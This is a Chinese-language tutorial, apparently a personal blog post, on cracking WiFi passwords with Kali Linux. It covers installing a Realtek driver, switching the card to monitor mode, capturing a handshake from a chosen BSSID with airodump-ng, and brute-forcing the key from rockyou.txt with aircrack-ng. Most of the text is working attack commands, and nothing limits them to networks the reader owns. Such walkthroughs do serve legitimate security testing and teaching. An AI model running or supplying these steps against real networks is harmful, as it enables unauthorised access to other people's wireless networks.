Kali Linux使用 airmon-ng 等相关命令爆破 Wifi 密码

首先我是在淘宝上买的免驱动的无线网卡，插上一般可以直接使用，不过买回来发现无法连接一些wifi,是wifi除了满格信号，就是没有信号黑色的。

我还以为这个wifi信号怎么这么差，联系客服发现是最新的kali需要安装一个软件包realtek-rtl8188eus-dkms

淘宝客服的教程:kali单频无线网卡驱动更新方法

使用apt安装该软件包

sudo apt install linux-headers-686-pae   (32位系统执行这个命令安装内核头文件，64位的系统不用执行，下面的命令会自动安装头文件）
sudo apt install realtek-rtl8188eus-dkms    -y  (32位与64位系统都要执行这条)

设置网卡为Monitor模式

安装后开始破解Wifi密码
首先需要将无线网卡设置为Monitor监听模式，因为airmon-ng这个命令需要我们设置为这个模式

sudo ifconfig wlan0 down  # 关闭wlan0网卡，这里可能不同的系统识别的名称不一样
sudo iwconfig wlan0 mode Monitor # 设置wlan0网卡为Monitor模式
sudo ifconfig wlan0 up    # 开启wlan0网卡

如果上述设置Monitor模式报错，可能是你的无线网卡不支持该模式，需要买一个支持的

关闭影响使用airmon-ng的进程

sudo airmon-ng check kill    # 该步骤会将系统的网络管理器杀死

开启wlan0网卡的监听模式

sudo airmon-ng start wlan0

注意我这里的网卡名称为wlan1

开启该网卡的unspec显示的内容会和我的类似

使用ariodump-ng检索wifi信息

sudo airodump-ng wlan1

这里有几个重要的结果，一会我们会使用到：

• BSSID: 代表这个无线网络的MAC地址
• CH: 代表这个无线网络使用的信道
• ESSID: 无线网络Wifi的名称

使用ariodum-ng对指定的wifi进行抓包

sudo airodump-ng --bssid 9C:A6:15:FF:BB:C7 -c 6 wlan1 -w /home/junglezt/桌面/NetworkSecurity/

其中参数:

• --bssid: 就是我们获取到指定网络的MAC地址
• -c: 指定该网络的信道
• -w: 指定抓取该网络数据包存放的位置

在抓取过程中，使用任意一台设备连接到该wifi，然后Ctrl + C停止抓包即可

抓取成功，会在/home/junglezt/桌面/NetworkSecurity/目录下生成一些文件，其中重要的是一个后缀名为cap的文件

使用aircrack-ng爆破抓取cap数据包中wifi的密码

爆破就是使用一个含有很多密码的字典，不断的尝试来直到试出密码为止，这里使用的字典是kali自带的/usr/share/wordlists/rockyou.txt

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/junglezt/桌面/NetworkSecurity/-01.cap

-w指定字典，对/home/junglezt/桌面/NetworkSecurity/-01.cap文件进行爆破

成功破解密码就会停止，这里我测试wifi的密码为Admin123,该密码在rockyou.txt中含有

注意：能不能破解出密码，取决于你的字典中有没有含有目标wifi的密码，取决与你字典和机器的性能。

实验结束。